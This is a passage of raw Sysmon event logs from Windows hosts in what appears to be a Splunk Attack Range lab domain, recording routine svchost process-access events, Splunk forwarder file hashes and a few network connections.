08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:20.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A10772D410EE58663BBE2ADBBD084FE,SHA256=528615C3FE93D3B69E371883228F403749FA3E89A36048253BAC14CFC87215D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:22.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE35EE90ECA29DCBB29CA49FA637A3A,SHA256=9D803D0928D34AE765AD96C16785043A8C036D3E0788F51FD767A74E78134AFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A5CEE91F4AFA9075D84874E4AA4E89,SHA256=45F733FE3BDB128BBB98AE4E594CF833C4C67AFFA3D86010120E00A851936CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCA32887F1069A78621F67EAC4DA2558,SHA256=4C95574E417B94B0360694CAFD8CB879FC24D1664001222CEB6C53D673361002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E623C005FB90B0FAB358AD5241589002,SHA256=D0A044603817F0FBA70AB2A60A59E934D00F0901DC52CD750C75155D12F12103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.937{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57432-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000809899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:21.961{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25420-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001053679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:23.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB93839669123367FE9FBBDA60875167,SHA256=AB56F5A8520ADFBEC60002CF25FD753C12602AE5EE4BA3E2B39E45616E29C46F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 